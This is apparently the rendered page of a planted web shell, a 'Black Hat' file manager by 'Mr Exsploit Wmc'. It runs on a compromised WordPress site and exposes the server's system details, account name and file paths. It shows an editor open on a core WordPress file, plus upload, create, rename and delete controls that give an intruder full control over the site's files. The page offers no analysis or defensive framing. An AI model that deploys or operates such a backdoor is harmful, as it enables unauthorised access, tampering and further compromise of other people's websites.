Bondowoso Black Hat File manager
Mr Exsploit Wmc
📁 Current Path:
🏠 Root
/
home
/
sc2yubq5167
/
sos-tout-debarras.com
/
wp-includes
⬆️ Go Up (..)
📊 Server Information
Server:
Apache
System:
Linux 4.18.0-553.75.1.lve.el8.x86_64
PHP Version:
8.1.34
User:
sc2yubq5167
Directory:
/home/sc2yubq5167/sos-tout-debarras.com/wp-includes
Free Space:
3.6 TB
🔧 Quick Actions
📤 Upload File
📁 Create Folder
📄 Create File
✏️ Editing: class-wp-text-diff-renderer-inline.php
<?php /** * Diff API: WP_Text_Diff_Renderer_inline class * * @package WordPress * @subpackage Diff * @since 4.7.0 */ /** * Better word splitting than the PEAR package provides. * * @since 2.6.0 * @uses Text_Diff_Renderer_inline Extends */ #[AllowDynamicProperties] class WP_Text_Diff_Renderer_inline extends Text_Diff_Renderer_inline { /** * @ignore * @since 2.6.0 * * @param string $string * @param string $newlineEscape * @return string */ public function _splitOnWords( $string, $newlineEscape = "\n" ) { // phpcs:ignore Universal.NamingConventions.NoReservedKeywordParameterNames.stringFound,WordPress.NamingConventions.ValidVariableName.VariableNotSnakeCase $string = str_replace( "\0", '', $string ); $words = preg_split( '/([^\w])/u', $string, -1, PREG_SPLIT_DELIM_CAPTURE ); $words = str_replace( "\n", $newlineEscape, $words ); // phpcs:ignore WordPress.NamingConventions.ValidVariableName.VariableNotSnakeCase return $words; } }
💾 Save
❌ Cancel
×
📤 Upload File
Select File (Max: 10 MB):
📤 Upload
❌ Cancel
×
📁 Create Folder
Folder Name:
Only letters, numbers, hyphens, underscores, and dots allowed
📁 Create
❌ Cancel
×
📄 Create File
File Name:
Only letters, numbers, hyphens, underscores, and dots allowed
📄 Create
❌ Cancel
×
✏️ Rename Item
New Name:
Only letters, numbers, hyphens, underscores, and dots allowed
✏️ Rename
❌ Cancel
×
🗑️ Delete Confirmation
Are you sure you want to delete "
"?
⚠️ This action cannot be undone!
🗑️ Yes, Delete
❌ Cancel